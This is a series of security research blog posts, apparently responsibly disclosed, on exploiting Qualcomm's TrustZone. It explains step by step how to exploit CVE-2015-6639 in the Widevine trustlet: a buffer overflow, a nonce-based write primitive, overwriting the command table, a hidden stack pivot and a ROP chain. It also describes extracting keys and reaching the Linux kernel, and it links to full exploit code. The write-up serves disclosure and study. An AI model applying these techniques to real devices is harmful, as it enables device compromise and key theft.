Now that we have all the pieces, all we need to do to gain code execution within the Linux Kernel is to:

Achieve QSEE code execution
Map-in all the kernel's memory in QSEE using "qsee_register_shared_buffer"
Find the kernel's symbol table
Lookup the "pppolac_proto_ops" symbol in the symbol table
Overwrite any function pointer to our user-supplied function address
Flush the changes made in QSEE using "qsee_prepare_shared_buf_for_nosecure_read"
Cause the kernel to call our user-supplied function by using a PPPOLAC socket

I've written some QSEE code which performs all of these steps and exports an easy-to-use interface to allow kernel code execution, like so:

As always, you can find the full code here:

https://github.com/laginimaineb/WarOfTheWorlds

I should note that the code currently only reads memory one DWORD at a time, making it quite slow. I didn't bother to speed it up, but any and all improvements are more than welcome (for example, reading large chunks of memory at a time would be much faster).

In the next blog post, we'll continue our journey from zero-to-TrustZone, and attempt to gain code execution within the TrustZone kernel.

QSEE privilege escalation vulnerability and exploit (CVE-2015-6639)

2016-05-02T15:23:00.000+03:00

In this blog post we'll discover and exploit a vulnerability which will allow us to gain code execution within Qualcomm's Secure Execution Environment (QSEE). I've responsibly disclosed this vulnerability to Google and it has been fixed - for the exact timeline, see the "Timeline" section below.

The QSEE Attack Surface

As we've seen in the previous blog post, Qualcomm's TrustZone implementation enables the "Normal World" operating system to load trusted applications (called trustlets) into a user-space environment within the "Secure World", called QSEE.

This service is provided to the "Normal World" by sending specific SMC calls which are handled by the "Secure World" kernel. However, since SMC calls cannot be invoked from user-mode, all communication between the "Normal World" and a trustlet must pass through the "Normal World" operating system's kernel.

Having said that, regular user-space processes within the "Normal World" sometimes need to communicate with trustlets which provide specific services to them. For example, when playing a DRM protected media file, the process in charge of handling media within Android, "mediaserver", must communicate with the appropriate DRM trustlet in order to decrypt and render the viewed media file. Similarly, the process in charge of handling cryptographic keys, "keystore", needs to be able to communicate with a special trustlet ("keymaster") which provides secure storage and operation on cryptographic keys.

So if communicating with trustlets requires the ability to issue SMCs, and this cannot be done from user-mode, then how do these processes actually communicate with the trustlets?

The answer is by using a Linux kernel device, called "qseecom", which enables user-space processes to perform a wide range of TrustZone-related operations, such as loading trustlets into the secure environment and communicating with loaded trustlets.

However! Although necessary, this is very dangerous; communication with TrustZone exposes a large (!) attack surface - if any trustlet that can be loaded on a particular device contains a vulnerability, we can exploit it in order to gain code execution within the trusted execution environment. Moreover, since the trusted execution environment has the ability to map-in and write to all physical memory belonging to the "Normal World", it can also be used in order to infect the "Normal World" operating system's kernel without there even being a vulnerability in the kernel (simply by directly modifying the kernel's code from the "Secure World").

Because of the dangers outlined above, the access to this device is restricted to the minimal set of processes that require it. A previous dive into the permissions required in order to access the driver has shown that only four processes are able to access "qseecom":

surfaceflinger (running with "system" user-ID)
drmserver (running with "drm" user-ID)
mediaserver (running with "media" user-ID)
keystore (running with "keystore" user-ID)

This means that if we manage to get hold of any of these four processes, we would then be able to attack any trustlet of our choice directly, bypassing the Linux kernel in the process! In fact, this is exactly what we'll do - but we'll get to that later in the series.

For this blog post, let's assume that we already have code-execution within the "mediaserver" process, thus allowing us to directly focus on the attack surface provided by trustlets. Here's an illustration to help visualise the path of the exploit chain we'll cover during the series and the focus of this post:

Vulnerability Scope

I haven't been able to confirm the exact scope of this issue. I've statically checked quite a few devices (such as the Droid Turbo, Nexus 6, Moto X 2nd Gen), and they were all vulnerable. In fact, I believe the issue was very wide-spread, and may have affected most Qualcomm-based devices at the time.

So why was this issue so prevalent? As we'll see shortly, the vulnerability is contained in a trustlet and so does not rely on the TrustZone kernel (which tends to change substantially between SoCs), but rather on code which is designed to be able to execute in the same manner on many different devices. As such, all devices containing the trustlet were made vulnerable, regardless of their SoC.

Also note that on some devices the vulnerable code was present but appeared slightly different (it may have been an older version of the same code). Those devices are also vulnerable, although the indicators and strings you might search for could be slightly different. This means that if you're searching for the exact strings mentioned in this post and don't find them, don't be dissuaded! Instead, reverse-engineer the trustlet using the tools from the previous blog post, and check for yourself.

Enter Widevine

Previously, we decided to focus our research efforts on the "widevine" trustlet, which enables playback of DRM encrypted media using Widevine's DRM platform. This trustlet seems like a good candidate since it is moderately complex (~125KB) and very wide-spread (according to their website, it is available on over 2 billion devices).

After assembling the raw trustlet, we are left with an ELF file, waiting to be analysed. Let's start by taking a look at the function registered by the trustlet in order to handle incoming commands:

As we can see, the first 32-bit value in the command is used to specify the command code, the high-word of which is used to sort the commands into four different categories.

Taking a peek at each of the category-handling functions reveals that the categories are quite rich - all in all, there are about 70 different supported commands - great! However, going over 70 different commands would be a pretty lengthy process - perhaps we can find a shortcut that'll point us in the right direction? For example, maybe there's a category of commands that were accidentally left in even though they're not used on production devices?

Since the libraries which are used to interact with the trustlets are also proprietary, we can't look through the source code to find the answers. Instead, I wrote a small IDAPython script to look up all the references to "QSEECom_send_cmd", the function used to send commands to trustlets, and check what the "command-code" value is for each reference. Then I simply grouped the results into the categories above, producing the following results:

So... Nobody is using 5X commands. Suspicious!

Sifting through the functions in the 5X category, we reach the following command:

Pretty straightforward: the function copies the data from our request buffer into a "malloc"-ed buffer (note that the length field here is not controlled by us, but is derived from the real buffer length passed to QSEOS). Then, the function's flow diverges according to a flag in our request buffer. Let's follow the flow leading to "PRDiagVerifyProvisioning":

Finally, we found a vulnerability!

After some simple validation (such as checking that the first DWORD in the command buffer is indeed zero), the function checks the value of the fourth DWORD in our crafted command buffer. As we can see above, setting that value to zero will lead us to a code-path in which a fully-controlled copy is performed from our command buffer into some global buffer, using the third DWORD as the length argument. Since this code-path only performs the vulnerable memcpy and nothing else, it is much more convenient to deal with (since it doesn't have unwanted side-effects), so we'll stick to this code-path (rather than the one above it, which seems more complex).
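To pin down what's missing, here is a sketch of the vulnerable path next to a bounded version. The header DWORD positions follow the description above, but the enum names are hypothetical, and placing the copied payload right after the four header DWORDs is an assumption made for illustration. The fix bounds the attacker-supplied length by both the destination size and the number of payload bytes actually received.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Header DWORD positions (hypothetical names; payload placement assumed). */
enum { REQ_ZERO = 0, REQ_LENGTH = 2, REQ_SELECTOR = 3, REQ_HEADER_DWORDS = 4 };

/* The pattern described above: the length field is trusted blindly. */
static void vulnerable_copy(uint8_t *dst, const uint32_t *req)
{
    if (req[REQ_ZERO] == 0 && req[REQ_SELECTOR] == 0)
        memcpy(dst, req + REQ_HEADER_DWORDS, req[REQ_LENGTH]);   /* no bound at all */
}

/* A bounded version: returns 0 on success, -1 if the request is rejected. */
static int checked_copy(uint8_t *dst, size_t dst_size,
                        const uint32_t *req, size_t req_bytes)
{
    const size_t header = REQ_HEADER_DWORDS * sizeof(uint32_t);
    if (req_bytes < header || req[REQ_ZERO] != 0 || req[REQ_SELECTOR] != 0)
        return -1;

    uint32_t len = req[REQ_LENGTH];
    if (len > dst_size || len > req_bytes - header)
        return -1;                     /* would overflow dst or over-read the request */

    memcpy(dst, (const uint8_t *)(req + REQ_HEADER_DWORDS), len);
    return 0;
}
```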

Moreover, you might be wondering what the "global buffer" referred to in the function above actually is. After all, it looks a little strange - it isn't passed in to the function at any point, but is simply referenced "magically", by using the register R9.

Remember how the trustlets that we analysed in the previous blog post had a large read-write data segment? This is the data segment in which all the modifiable data of the trustlet is stored - the stack, the heap and the global variables. In order to quickly access this segment from any location in the code, Qualcomm decided to use the platform-specific R9 register as a "global register" whose value is never modified, and which always points to the beginning of the aforementioned segment. According to the ARM AAPCS, this is actually valid behaviour:

What now?

Now that we have a primitive, it's time to try and understand which pieces of data are controllable by our overflow. Again, using a short IDAPython script, we can search for all references to the "global buffer" (R9) which reside after the overflown buffer's start address (that is, after offset 0x10FC). Here are the results:

Disappointingly, nearly all of these functions don't perform any "meaningful" operations on the controllable pieces of data. Specifically, the vast majority of these functions simply store file-system paths in those memory locations, which offers no obvious way to hijack control flow.

Primitive Technology

Since there aren't any function pointers or immediate ways to manipulate control flow directly after the overflown buffer, we'll need to upgrade our buffer overflow primitive into a stronger primitive before we can gain code execution.

Going through the list of functions above, we come across an interesting block of data referred to by several functions:

As you can see above, the block of 0x32 DWORDs starting at offset 0x169C is used to store "sessions". Whenever a client sends commands to the Widevine trustlet, they must first create a new "session", and all subsequent operations are performed using the specific session identifier issued during the session's creation. This is needed, for example, in order to allow more than a single application to decrypt DRM content at the same time while having completely different internal states.
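Because the pointer array lives at a fixed R9-relative offset, the overflow length needed to reach a given session slot is simple arithmetic. Below is a small sketch, assuming the copy starts exactly at the overflown buffer's offset of 0x10FC. The helper names are illustrative.

```python
OVERFLOWN_BUFFER_OFFSET = 0x10FC   # where the controlled copy starts (R9-relative)
SESSIONS_OFFSET = 0x169C           # start of the session-pointer array (R9-relative)
NUM_SESSIONS = 0x32                # number of DWORD slots in the array

def session_slot_offset(index):
    """R9-relative offset of the index-th session pointer."""
    if not 0 <= index < NUM_SESSIONS:
        raise IndexError(index)
    return SESSIONS_OFFSET + 4 * index

def copy_length_to_overwrite(index):
    """Minimal copy length (from the buffer start) that fully covers slot `index`."""
    return session_slot_offset(index) + 4 - OVERFLOWN_BUFFER_OFFSET
```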

In any case, as luck would have it, the sessions are complex structures - hinting that they may be used in order to subtly introduce side-effects in our favour. They are also within our line-of-fire, as they are stored at an offset greater than that of the overflown buffer. But, unfortunately, the 0x32 DWORD block mentioned above only stores the pointers to these session objects, not the objects themselves. This means that if we want to overwrite these values, they must point to addresses which are accessible from QSEE (otherwise, trying to access them will simply result in the trustlet crashing).

Finding Ourselves

In order to craft legal session pointers, we'll need to find out where our trustlet is loaded. Exploring the relevant code reveals that QSEOS goes to great lengths in order to protect trustlets from the "Normal World". This is done by creating a special memory region, referred to as "secapp-region", from which the trustlet's memory segments are carved. This area is also protected by an MPU, which prevents the "Normal World" from accessing it in any way (attempting to access those physical addresses from the "Normal World" causes the device to reset).

On the other hand, trustlets reside within the secure region and can obviously access their own memory segments. Not only that, but in fact trustlets can access all allocated memory within the "secapp" region, even memory belonging to other trustlets! However, any attempt to access unallocated memory within the region results in the trustlet immediately crashing.

...Sounds like we're beginning to form a plan!

We can use the overflow primitive in order to overwrite a session pointer with a location within the "secapp" region. Then, we can issue a command which causes a read through our poisoned session pointer. If the trustlet crashes after issuing the command, we guessed wrong (in that case, we can simply reload the trustlet). Otherwise, we've found an allocated page in the "secapp" region.

But... How do we know which trustlet that page belongs to?

We already have a way to differentiate between allocated and unallocated pages. Now, we need some way to distinguish between pages based on their contents.

Here's an idea - let's look for a function that behaves differently based on the value it reads through the session pointer:

Okay! This function reads the data at session_pointer + 0xDA. If that value is equal to one, it returns 24; otherwise, it returns 35.

This is just like finding a good watermelon; by "tapping" on various memory locations and listening to the "sound" they make, we can deduce something about their contents. Now we just need to give our trustlet a unique "sound" that we can identify by tapping on it.

Since we can only listen to differences between one and non-one values, let's mark our trustlet by creating a unique pattern containing ones and zeros within it. For example, here's a pattern which doesn't occur in any other trustlet:

Now, we can simply write this pattern to the trustlet's data segment by using our overflow primitive, effectively giving it its own distinct "sound".

Finally, we can repeat the following strategy until we find the trustlet:

Randomly tap a memory location in the "secapp" region:

If it sounds "hollow" (i.e., the trustlet crashes) - there's nothing there, so reload our trustlet
Otherwise, tap the sequence of locations within the page which should contain our distinct marking pattern. If it sounds like the pattern above, we found our trustlet
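The strategy above can be modelled end-to-end in a few lines. This is a toy simulation, not device code. `SimulatedSecapp`, `tap` and `find_marked_page` are hypothetical names. A crash is modelled as an exception, the tapped field is assumed to be a single byte, and the marker offsets are assumed to be relative to a 4KB page.

```python
import random

ONE_RESULT, OTHER_RESULT = 24, 35   # return values of the "tapping" function
FIELD_OFFSET = 0xDA                 # field read relative to the session pointer
PAGE_SIZE = 0x1000                  # assumed page granularity

class TrustletCrashed(Exception):
    """Stands in for the trustlet crashing on an unallocated access."""

class SimulatedSecapp:
    """Toy model of the secapp region: only allocated ranges can be read."""

    def __init__(self, allocations):
        self.allocations = allocations   # start address -> bytes

    def read_byte(self, addr):
        for start, data in self.allocations.items():
            if start <= addr < start + len(data):
                return data[addr - start]
        raise TrustletCrashed(hex(addr))

def tap(secapp, addr):
    """Aim the poisoned session pointer so that ptr + 0xDA == addr, then 'listen'."""
    session_ptr = addr - FIELD_OFFSET
    value = secapp.read_byte(session_ptr + FIELD_OFFSET)
    return ONE_RESULT if value == 1 else OTHER_RESULT

def matches_marker(secapp, page, marker):
    """marker: list of (offset_in_page, bit) pairs forming the distinct 'sound'."""
    try:
        return all((tap(secapp, page + off) == ONE_RESULT) == bool(bit)
                   for off, bit in marker)
    except TrustletCrashed:
        return False

def find_marked_page(secapp, region_start, region_end, marker, rng=None, max_probes=10000):
    rng = rng or random.Random()
    for _ in range(max_probes):
        addr = rng.randrange(region_start, region_end)
        try:
            tap(secapp, addr)           # a "hollow" sound raises TrustletCrashed
        except TrustletCrashed:
            continue                    # on a device: reload the trustlet, then retry
        page = addr & ~(PAGE_SIZE - 1)
        if matches_marker(secapp, page, marker):
            return page
    return None
```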

Of course, inspecting the allocation scheme used by QSEOS could allow us to speed things up further by only checking relevant memory locations. For example, QSEOS seems to allocate trustlets consecutively, meaning that simply scanning from the end of the "secapp" region towards its beginning, using increments of half the trustlet's size, will guarantee a successful match.
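Here is a sketch of that scan order, assuming the trustlet occupies one contiguous range of at least `trustlet_size` bytes inside the region. The function name is illustrative. With a step of half the size, every such range contains at least one probe.

```python
def probe_addresses(region_start, region_end, trustlet_size):
    """Yield probe addresses from the end of the region towards its start.

    The step is half the trustlet's size, so no contiguous trustlet-sized
    range inside [region_start, region_end) can fall between two probes.
    """
    step = max(1, trustlet_size // 2)
    addr = region_end - step
    while addr >= region_start:
        yield addr
        addr -= step
```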

A (messy) write primitive

Now that we have a way to find the trustlet in the secure region, we are able to craft "valid" session pointers, which point to locations within the trustlet. Next up, we need to find a way to create a write primitive. So... are there any functions which write controllable data into a session pointer?

Surprisingly, nearly all functions that do write data to the session pointer do not allow for arbitrary control over the data being written. Nonetheless, one function looks like it could be of some help:

This function generates a random DWORD to be used as a "nonce", then checks whether enough time has elapsed since it was last called. If so, it adds the random value to the session pointer by calling "addNonceToCache".

First of all, since the "time" field is saved in the global buffer after our overflown buffer, we can easily clear it using our overflow primitive, thus removing the time limitation and allowing us to call the function as frequently as we'd like. Also, note that the generated nonce's random value is written into a buffer which is returned to the user - this means that after a nonce is generated, the caller also learns the value of the nonce.

Let's take a peek at how the nonces are stored in the session pointer:

So there's an array of 16 nonces in the session object - starting at offset 0x88. Whenever a nonce is added, all the previous nonce values are "rolled over" one position to the right (discarding the last nonce), and the new nonce is written into the first location in the nonce array.

See where we're going with this? This is actually a pretty powerful write primitive (albeit a little messy)!

Whenever we want to write a value to a specific location, we can simply set the session pointer to point to that location (minus the offset of the nonces array). Then, we can start generating nonces, until the least-significant byte (this is a little-endian machine) in the generated nonce matches the byte we would like to write. Then, once we get a match, we can increment the session pointer by one, generate the next byte, and so forth.

This allows us to write any arbitrary value using an expected 256 nonce-generation calls per byte (each call matches the wanted byte with probability 1/256, so the number of calls is a geometric random variable with mean 256). But at what cost?
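The write primitive can be simulated against a plain bytearray to check the reasoning, including the roll-over of the nonce cache. This model makes two assumptions: the cache is 16 little-endian DWORDs at session + 0x88, and it is shifted exactly as described above. `add_nonce_to_cache` mirrors the name above but is a reimplementation, and `messy_write` is hypothetical.

```python
import random
import struct

NONCES_OFFSET = 0x88   # start of the nonce array inside the session object
NUM_NONCES = 16

def add_nonce_to_cache(mem, session_ptr, nonce):
    """Shift the 16 DWORDs right by one (dropping the last), then store the new nonce first."""
    base = session_ptr + NONCES_OFFSET
    # The right-hand slice is a copy, so this behaves like memmove
    mem[base + 4:base + 4 * NUM_NONCES] = mem[base:base + 4 * (NUM_NONCES - 1)]
    struct.pack_into("<I", mem, base, nonce)

def messy_write(mem, target, data, rng=None):
    """Write `data` at `target` one byte at a time; return the number of nonces generated."""
    rng = rng or random.Random()
    calls = 0
    for i, wanted in enumerate(data):
        session_ptr = target + i - NONCES_OFFSET   # nonce[0] now lands at target + i
        while True:
            nonce = rng.getrandbits(32)            # stands in for the trustlet's random nonce
            add_nonce_to_cache(mem, session_ptr, nonce)
            calls += 1
            if nonce & 0xFF == wanted:             # little-endian: the LSB sits at target + i
                break
    return calls
```

Each new nonce is written one byte further along than the previous one, so the bytes already written survive, while the region following the last written byte is left holding rolled-over nonce data.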

Since the values in the nonce cache are "rotated" after every call, we mess up the 15 DWORDs following the last written memory location. We'll have to work our way around that when we design the exploit.

Writing an exploit

We finally have enough primitives to craft a full exploit! All we need to do is find a value that we can overwrite using the messy write primitive, which will allow us to hijack the control flow of the application.

Let's take a look at the function in charge of handling the "6X" category of commands:

As you can see, the function calls the requested commands by using the command ID specified as an index into an array stored in the global buffer. Each supported command is represented by a 12-byte entry in the array, containing four pieces of information:

The command code (32-bits)
A pointer to the handling function itself (32-bits)
The minimal input length (16-bits)
The minimal output length (16-bits)

If this information is valid, the function pointer is executed, passing in the user's input buffer as the first argument and the output buffer as the second argument.
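Below is a sketch of the table lookup and dispatch. It assumes the entry layout listed above, packed as little-endian `<IIHH`. It also assumes that the validity check compares the stored command code and both minimal lengths. Executing a handler is modelled with a dictionary from address to Python callable. `dispatch` and `code_at` are hypothetical.

```python
import struct

ENTRY_FORMAT = "<IIHH"   # command code, handler pointer, min input len, min output len
ENTRY_SIZE = struct.calcsize(ENTRY_FORMAT)   # 12 bytes, matching the layout above

def parse_entry(table, index):
    return struct.unpack_from(ENTRY_FORMAT, table, index * ENTRY_SIZE)

def dispatch(table, index, command_code, inbuf, outbuf, code_at):
    """Model of the 6X handler; `code_at` maps a handler address to a Python callable."""
    code, handler, min_in, min_out = parse_entry(table, index)
    if code != command_code or len(inbuf) < min_in or len(outbuf) < min_out:
        return None
    return code_at[handler](inbuf, outbuf)   # first arg: input buffer, second: output buffer
```

In this model, overwriting only the 4-byte pointer field at offset 4 of an entry is enough to redirect the command.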

If we choose an innocuous 6X command, we can overwrite the corresponding entry in the array above so that its function pointer will be directed at any piece of code we'd like to execute. Then, simply calling this command will cause the trustlet to execute the code at our controlled memory location. Great!

We should be wary, however, not to choose an entry which lies directly before an "important" command that we might need later. This is because our messy write primitive will destroy the following 15 DWORDs (60 bytes, i.e., the next five 12-byte array entries). Let's take a look at the function which populates the entries in the command array:

There are six consecutive entries corresponding to unused functions. Therefore, if we choose to overwrite the entry directly before them, we'll stay out of trouble.
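Picking the entry can be phrased as a small search: find an index whose following five entries are all unused. In the sketch below, the list of unused flags is an input you would derive from the table-populating function. The helper name is illustrative.

```python
CLOBBERED_DWORDS = 15
ENTRY_SIZE = 12
CLOBBERED_ENTRIES = CLOBBERED_DWORDS * 4 // ENTRY_SIZE   # 60 bytes -> 5 entries

def safe_entries(unused):
    """Indices i whose following CLOBBERED_ENTRIES entries are all unused.

    `unused` holds one boolean per command-table entry.
    """
    return [i for i in range(len(unused) - CLOBBERED_ENTRIES)
            if all(unused[i + 1:i + 1 + CLOBBERED_ENTRIES])]
```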

Universal Shellcode Machine

Although we can now hijack the control flow, we still can't quite execute arbitrary code within QSEE. The regular course of action at this point would be to find a stack-pivot gadget and write a short ROP chain which allocates executable memory for our shellcode. However, since the trustlets' code segments aren't writeable, and the TrustZone kernel doesn't expose any system call to QSEE to allow the allocation of new executable pages, we are left with no way to create executable shellcode.

So does this mean we need to write all our logic as a ROP chain? That would be extremely inconvenient (even with the aid of automatic "ROP"-compilers), and might not even be possible if the ROP gadgets in the trustlet are not Turing-complete.

Luckily, after some careful consideration, we can actually avoid the need to write a longer ROP chain. If we think of our shellcode as a Turing Machine, we would like to create a "Universal Turing Machine" (or simulator), which will enable us to execute any given shellcode as if it were running completely within QSEE.

Given a piece of code, we can easily simulate all the control-flow and logic in the "Normal World", simply by executing the code fully in the "Normal World". But what about operations which behave differently in a QSEE-context? If we think about it, there are only a few such operations:

Reading and writing memory
Calling system calls exposed by the TrustZone kernel

These operations must execute within QSEE. However, we can actually execute both of these operations in QSEE by writing one small ROP chain!

All we need is a single ROP chain which will:

Hijack control flow to a separate stack
Prepare arguments for a function call
Call the wanted QSEE function
Return the result to the user and restore execution in QSEE

As you can see, all this chain does is enable us to execute any given QSEE function with any supplied arguments. But how can we use it to simulate the special operations?

Well, since all system-calls in QSEE have matching calling-stubs in each trustlet, we can use our ROP chain to execute any system call with ease. As for memory accesses - there is an abundance of QSEE functions which can be used as read and write gadgets. Hence, both operations are simple to execute using our short ROP chain.

This leaves us with the following model:

This also means that executing arbitrary shellcode in QSEE doesn't require any engineering effort! All the shellcode developer needs to do is to delegate memory accesses and system calls to specific APIs exposed by the exploit. The rest of the shellcode's logic can remain unchanged and execute completely in the "Normal World". We'll see an example of some shellcode using this model shortly.
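Here is a minimal Python sketch of this model. `QSEEContext`, `call_function` and the gadget addresses are hypothetical placeholders for what the exploit provides. The point is that the shellcode logic stays ordinary code, and only memory accesses and system calls go through the single ROP-backed call.

```python
class QSEEContext:
    """Hypothetical exploit interface: only these operations execute inside QSEE.

    `call_function(address, *args)` stands for the ROP chain that calls a QSEE
    function with the given arguments and returns its result. `read_gadget` and
    `write_gadget` are addresses of existing trustlet functions used for memory
    access; system calls go through the trustlet's own calling stubs.
    """

    def __init__(self, call_function, read_gadget, write_gadget):
        self.call_function = call_function
        self.read_gadget = read_gadget
        self.write_gadget = write_gadget

    def read_dword(self, addr):
        return self.call_function(self.read_gadget, addr)

    def write_dword(self, addr, value):
        self.call_function(self.write_gadget, addr, value)

    def syscall(self, stub_address, *args):
        return self.call_function(stub_address, *args)

def sum_dwords(ctx, addr, count):
    """Example 'shellcode': the loop runs in the Normal World, only reads go to QSEE."""
    return sum(ctx.read_dword(addr + 4 * i) for i in range(count)) & 0xFFFFFFFF
```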

Finding a stack pivot

In order to execute a ROP chain, we need to find a convenient stack-pivot gadget. When dealing with large or medium-sized applications, this is not a daunting task - there is simply enough code for us to find at least one gadget that we can use.

However, since we're only dealing with ~125KB of code, we might not be that lucky. Not only that, but at the point at which we hijack the control flow, we only have control over the registers R0 and R1, which point to the input and output buffers, respectively.

After fully disassembling the trustlet's code we are faced with the harsh truth - it seems as though there is no usable stack pivot using our controlled registers. So what can we do?

Recall that ARM opcodes can be decoded in more than one way, depending on the value of the T bit in the CPSR. When the bit is set, the processor is executing in "Thumb" mode, in which the instruction length is 16-bits. Otherwise, the processor is in "ARM" mode, with an instruction length of 32-bits.

We can easily switch between these modes by using the least-significant bit of the address being jumped to when performing an interworking branch (such as BX, or a POP into PC). If the least-significant bit is set, the T bit will be set, and the processor will switch to "Thumb" mode. Otherwise, it will switch to "ARM" mode.
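Here is a small model of the rule that makes the two decodings explicit. The function name is illustrative. It treats bit 0 as the instruction-set selector and rejects ARM-state targets that are not 4-byte aligned.

```python
def interworking_target(address):
    """Return (instruction_set, pc) for an interworking branch to `address`."""
    if address & 1:
        return "Thumb", address & ~1   # bit 0 set: Thumb state, bit 0 cleared from the PC
    if address & 2:
        raise ValueError("ARM-state targets must be 4-byte aligned")
    return "ARM", address
```

So the same bytes at address X run as Thumb code when jumped to as X | 1, and are decoded as ARM instructions (such as the hidden stack pivot) when jumped to as X, provided X is 4-byte aligned.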

Looking at the trustlet's code - it seems to contain mostly "Thumb" instructions. But perhaps if we were to forcibly decode the instructions as if they were "ARM" instructions, we'd be able to find a hidden stack pivot which was not visible beforehand.

Indeed, that is the case! Searching through the ARM opcodes reveals a very convenient stack-pivot:

By executing this opcode, we will be able to fully control the stack pointer, program counter and other registers by using the values stored in R0 - which, as we saw above, points to the fully user-controlled input buffer. Great!

As for the rest of the ROP chain - it is pretty standard. In order to execute a function and return all we need to do is build a short chain which:

Set the low registers (R0-R3) and the stack arguments to the function's arguments
Set the link register to point to the rest of our chain
Jump to the function's start address
When control is returned via the crafted LR value, store the return value in a user-accessible memory location, such as the supplied output buffer
Restore the stack pointer to the original location and return to the location from which control was originally hijacked
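The first step follows the ARM AAPCS: the first four 32-bit arguments go in R0-R3 and any remaining ones go on the stack. Below is a sketch of that split, assuming every argument is a 32-bit integer or pointer. 64-bit arguments have extra alignment rules that are not handled here. The function name is hypothetical.

```python
import struct

def aapcs_call_layout(args):
    """Split 32-bit arguments per the AAPCS: R0-R3 first, the rest on the stack.

    Returns (registers, stack_bytes). stack_bytes must sit at SP when the target
    function is entered, lowest-numbered stack argument at the lowest address.
    (The AAPCS also requires SP to be 8-byte aligned at a public call.)
    """
    words = [a & 0xFFFFFFFF for a in args]
    registers = words[:4] + [0] * (4 - len(words[:4]))
    stack = words[4:]
    return registers, struct.pack("<%dI" % len(stack), *stack)
```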

You can find the complete ROP chain and gadgets in the provided exploit code, but I imagine it's exactly what you'd expect.

Putting it all together

At long last, we have all the pieces needed to create a fully functional exploit. Here's a short run-down of the exploit's stages:

Find the Widevine application by repeatedly "tapping" the secapp region and "listening"
Create a "messy" write gadget using the nonce-generation command
Overwrite an unused 6X command entry using the write gadget to direct it to a stack-pivot
Execute any arbitrary code using a small ROP chain under the "Universal Shellcode Machine"

The Exploit

As always, the full exploit code is available here:

https://github.com/laginimaineb/cve-2015-6639

I've also included a sample shellcode using the model described earlier. The shellcode reads a file from TrustZone's secure file-system - SFS. This file-system is encrypted using a special hardware key which should be inaccessible to software running on the device - you can read more about it here. Regardless, running within the "Secure World" allows us to access SFS fully, and even extract critical encryption keys, such as those used to decrypt DRM content.

In fact, this is all it takes:

Also, please note that there are quite a few small details that I did not go into in this blog post (for brevity’s sake, and to keep it interesting). However, every single detail is documented in the exploit's code. So by all means, if you have any unanswered questions regarding the exploit, I encourage you to take a look at the code and documentation.

What's next?

Although we have full code-execution within QSEE, there are still some things beyond our reach. Specifically, we are limited only to the API provided by the system-calls exposed by the TrustZone kernel. For example, if we were looking to unlock a bootloader, we would probably need to be able to blow the device's QFuses. This is, understandably, not possible from QSEE.

With that in mind, in the next blog post, we'll attempt to further elevate our privileges from QSEE to the TrustZone kernel!

Timeline

27.09.2015 - Vulnerability disclosed
27.09.2015 - Initial response from Google
01.10.2015 - PoC sent to Google
14.12.2015 - Vulnerability fixed, patch distributed

I would also like to mention that on 19.10.2015 I was notified by Google that this issue has already been internally discovered and reported by Qualcomm. However, for some reason, the fix was not applied to Nexus devices.

Moreover, there are quite a few firmware images for other devices (such as the Droid Turbo) that I've downloaded from that same time period that appeared to still contain the vulnerability! This suggests that there may have been a hiccup when internally reporting the vulnerability or when applying the fix.

Regardless, as Google included the issue in the 14.12.2015 bulletin, any OEMs that may have missed the opportunity to patch the issue beforehand got another reminder.

Exploring Qualcomm's Secure Execution Environment

2016-04-26T14:16:00.000+03:00

Welcome to a new series of blog posts!

In this series, we'll dive once more into the world of TrustZone, and explore a new chain of vulnerabilities and corresponding exploits which will allow us to elevate privileges from zero permissions to code execution in the TrustZone kernel.

This may sound familiar to those of you who have read the previous series - but let me reassure you; this series will be much more exciting!

First of all, this exploit chain features a privilege escalation which is universal across all Android versions and phones (and which requires zero permissions) and a TrustZone exploit which affects a very wide variety of devices. Secondly, we will dive deep into an as-of-yet unexplored operating system - QSEE - Qualcomm's Secure Execution Environment. Lastly, we'll see some interesting TrustZone payloads, such as directly extracting a real fingerprint from TrustZone's encrypted file-system.

In case you would like to follow along with the symbols and disassembled binaries, I will be using my own Nexus 6 throughout this series, with the following fingerprint:

google/shamu/shamu:5.1.1/LMY48M/2167285:user/release-keys

You can find the exact factory image here.

Oh say can QSEE

In this blog post, we'll explore Qualcomm's Secure Execution Environment (QSEE).

As we've previously discussed, one of the main reasons for the inclusion of TrustZone on devices is the ability to provide a "Trusted Execution Environment" (TEE) - an environment which should theoretically allow computation which cannot be interfered with from the regular operating system, and is therefore "trusted".

This is achieved by creating a small operating system which operates solely in the "Secure World" facilitated by TrustZone. This operating system provides a small number of services directly in the form of system calls which are handled by the TrustZone kernel (TZBSP) itself. However, in order to allow for an extensible model where "trusted" functionality can be added, the TrustZone kernel can also securely load and execute small programs called "Trustlets", which are meant to provide a secure service to the insecure ("Normal World") operating system (in our case, Android).

There are several such Trustlets commonly used on devices:

keymaster - Implements the key management API provided by the Android "keystore" daemon. It can securely generate and store cryptographic keys and allow the users to operate on data using these keys.
widevine - Implementation of Widevine DRM, which allows "secure" playback of media on the device.

In fact, there are many more DRM related trustlets, depending on the OEM and the device, but these two trustlets are universally used.

Where do we start?

Naturally, one place to start would be to look at a trustlet of our choice, and to try and understand what makes it tick. Since the "widevine" module is one of the most ubiquitous, we'll focus on it.

Searching briefly for the widevine trustlet itself in the device's firmware reveals the following:

Apparently the trustlet is split into a few different files... Opening the files reveals a jumbled up mess - some files contain what looks like code, others contain ELF headers and metadata. In any case, before we can start disassembling the trustlet, we need to make some sense out of this format. We can either do this by opening each of the files and guessing the meaning of each blob, or by following the code-paths responsible for loading the trustlet - let's try a little of both.

Loading a Trustlet

In order to load a trustlet from the "Normal World", applications can use the libQSEECom.so shared object, which exports the function "QSEECom_start_app":

Unfortunately this library's source code is not available, so we'll have to reverse engineer the function's implementation to find out what it does. Doing so reveals that it performs the following operations:

Opens the /dev/qseecom device and calls some ioctls to configure it
Opens the ".mdt" file associated with the trustlet and reads the first 0x34 bytes from it
Calculates the number of ".bXX" files using the 0x34 bytes from the ".mdt"
Allocates a physically contiguous buffer (using "ion") and copies the ".mdt" and ".bXX" files into it
Finally, calls an ioctl to load the trustlet itself, using the allocated buffer

So, still no luck on exactly how the images are loaded, but we're getting there.

First of all, the number 0x34 might look familiar - this is the size of a (32 bit) ELF header. Opening the MDT file reveals that the first 0x34 bytes are indeed a valid ELF header:

Moreover, the "QSEECom_start_app" function we just had a look at used the 16-bit value at offset 0x2C in order to calculate the number of ".bXX" files. As you can see above, this corresponds to the "e_phnum" field in the ELF header.
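Parsing these fields takes only a few lines. The sketch below assumes a little-endian 32-bit ELF header and the "<name>.bXX" file naming seen above. The helper names and the "widevine" example name are illustrative.

```python
import struct

ELF32_HEADER_SIZE = 0x34

def parse_mdt_header(mdt):
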